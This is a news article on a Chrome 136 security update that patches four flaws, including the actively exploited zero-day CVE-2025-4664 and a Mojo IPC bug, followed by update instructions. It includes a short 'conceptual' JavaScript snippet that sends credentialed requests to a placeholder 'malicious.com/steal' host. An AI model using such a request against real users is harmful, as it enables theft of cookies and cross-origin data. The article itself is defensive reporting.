Google has released a critical security update for Chrome, pushing the Stable channel to version 136.0.7103.113/.114 for Windows and Mac, and 136.0.7103.113 for Linux.
This rollout will reach users over the coming days and weeks and addresses four security vulnerabilities, including a high-severity zero-day actively exploited in the wild.
Zero-Day Exploit: CVE-2025- 4664
The most urgent fix targets CVE-2025-4664, a flaw described as “insufficient policy enforcement in Loader.”
Security researchers warn that this vulnerability allows remote attackers to bypass Chrome’s internal security policies via crafted HTML, enabling cross-origin data leaks and potentially unauthorized code execution.
The exploit was first disclosed by @slonser_ on May 5, 2025, and Google confirmed active exploitation before the patch release.
Technical analysis indicates attackers could leverage this bug to escape browser sandboxing, a core defense mechanism isolating web content from system resources.
javascript// Example: Exploiting insufficient policy enforcement (conceptual)
fetch('https://malicious.com/steal', {
credentials: 'include'
})
.then(response => response.text())
.then(data => {
// Cross-origin data exfiltration logic
});
Mojo IPC Vulnerability: CVE-2025- 4609
Another high-severity bug, CVE-2025-4609, involves the Mojo Inter-Process Communication (IPC) subsystem.
Incorrect handling of the system in unspecified scenarios could enable privilege escalation or memory corruption, particularly on Windows systems.
Such flaws undermine the Chrome sandbox, potentially allowing sandboxed renderer processes to access privileged resources.
Security Engineering and Detection
Google credits external researchers for identifying these vulnerabilities and highlights its ongoing use of advanced memory analysis tools like AddressSanitizer, MemorySanitizer, and libFuzzer.
AddressSanitizer, for instance, instruments code to detect out-of-bounds memory accesses and use-after-free bugs, providing real-time detection with minimal performance overhead.
Additional Security Enhancements
- Chrome 136 introduces privacy improvements, such as reducing fingerprinting via the
Accept-Languageheader and partitioning:visitedLink history to prevent cross-site history leaks. - The update also includes a new policy to “de-elevate” Chrome if launched with administrator privileges, reducing the risk of malware gaining system-level access through the browser.
Update Guidance
Users are strongly advised to update Chrome immediately by navigating to chrome://settings/help.
The patched versions are:
- Windows/Mac: 136.0.7103.113/.114
- Linux: 136.0.7103.113
- Android: 136.0.7103.125 (via Google Play)
With active exploitation reported, prompt updating is critical to mitigate risk from these vulnerabilities.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
.webp?resize=1600,900&ssl=1&description=This rollout will reach users over the coming days and weeks and addresses four security vulnerabilities, including a high-severity zero-day actively exploited in the wild.){kind=link}